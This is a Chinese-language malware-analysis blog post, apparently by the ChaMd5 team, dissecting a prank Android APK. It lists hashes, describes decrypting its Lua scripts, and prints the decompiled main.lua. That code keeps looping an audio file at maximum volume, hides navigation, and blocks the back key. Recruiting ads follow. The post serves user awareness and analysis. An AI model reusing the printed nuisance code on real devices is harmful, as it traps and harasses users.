20190927收到一個apk,名字叫“送給最好的TA.apk”。檔案哈希值如下:
送給最好的TA.apk
Size: 741707 bytes
CRC32: 31C62FAD
MD5: 9819F3FA458129D7CA092C32839B7F38
SHA1: A948ACADD5647FF44E120CC6789BE7D8CCA59660
SHA256: 205160694C6D86C3056AAA2FB196B485CFA2A8A2F9F08BA966BE03B9EBFD936A
逆向分析
用AndroidKiller對apk進行逆向分析。
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLicmbw5yMjFzY5MjZhNjZ1IWMzIzYzEWY5kDM5MzMzIjZhFGZw8CX0JXZ252bj91Ztl2Lc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
發現一個0.mp3和2個lua檔案。其中0.mp3就是罪魁禍首了。而lua檔案打開是亂碼也不是位元組碼。
通過分析java代碼,發現調用了lib\armeabi-v7a\libluajava.so對lua進行解密,于是用IDA Pro 7.0 x86對so檔案進行逆向。
在luaL.loadbufferx函數裡,有解密過程,整個代碼不複雜,編寫解密腳本如下:
解密後是正常的lua位元組碼,可使用unluac進行反編譯。
解密後的init.lua:
解密後的main.lua:
require("import")
import("android.app.*")
import("android.os.*")
import("android.widget.*")
import("android.view.*")
import("android.view.View")
import("android.content.Context")
import("android.media.MediaPlayer")
import("android.media.AudioManager")
import("com.androlua.Ticker")
activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)
activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE)
m = MediaPlayer()
m.reset()
m.setDataSource(activity.getLuaDir() .. "/0.mp3")
m.prepare()
m.start()
m.setLooping(true)
ti = Ticker()
ti.Period = 10
function ti.onTick()activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE)endti.start()function onKeyDown(A0_0, A1_1)if string.find(tostring(A1_1), "KEYCODE_BACK") ~= nil thenactivity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)endreturn trueend
其中,定時器不斷地設定音量為15(最大值)。
安全意識的感悟
科技發展日新月異,加強關注網絡安全,提高網絡安全意識刻不容緩。在網絡安全意識上一定要多加注意,多了解一些網絡安全常識和網絡安全技術問題,可以使我們能保證自己的安全。
另外,程式員制作程式的初衷應當是為了讓世界更友善快捷美好之類的,而做這些亂七八糟坑人的東西,根本沒有任何意義。
~~ChaMd5安全招聘~~
火睛安全團隊
滲透測試工程師
http://www.chamd5.org/jobdetail.aspx?id=823
深圳市拓豹科技有限公司
資訊安全工程師
http://www.chamd5.org/jobdetail.aspx?id=822
京東
進階安全工程師-系統安全方向
http://www.chamd5.org/jobdetail.aspx?id=819
OPPO子午實驗室
進階IoT安全工程師
http://www.chamd5.org/jobdetail.aspx?id=814
進階Android安全工程師
http://www.chamd5.org/jobdetail.aspx?id=815
進階業務安全工程師
http://www.chamd5.org/jobdetail.aspx?id=816
進階WEB安全工程師
http://www.chamd5.org/jobdetail.aspx?id=817
進階隐私合規測試工程師
http://www.chamd5.org/jobdetail.aspx?id=818
國鐵吉訊科技有限公司
安全滲透工程師
http://www.chamd5.org/jobdetail.aspx?id=809
進階安全逆向工程師(偏移動端)
http://www.chamd5.org/jobdetail.aspx?id=810
招新小廣告
ChaMd5 ctf組 長期招新
尤其是crypto+reverse+pwn+合約的大佬
歡迎聯系[email protected]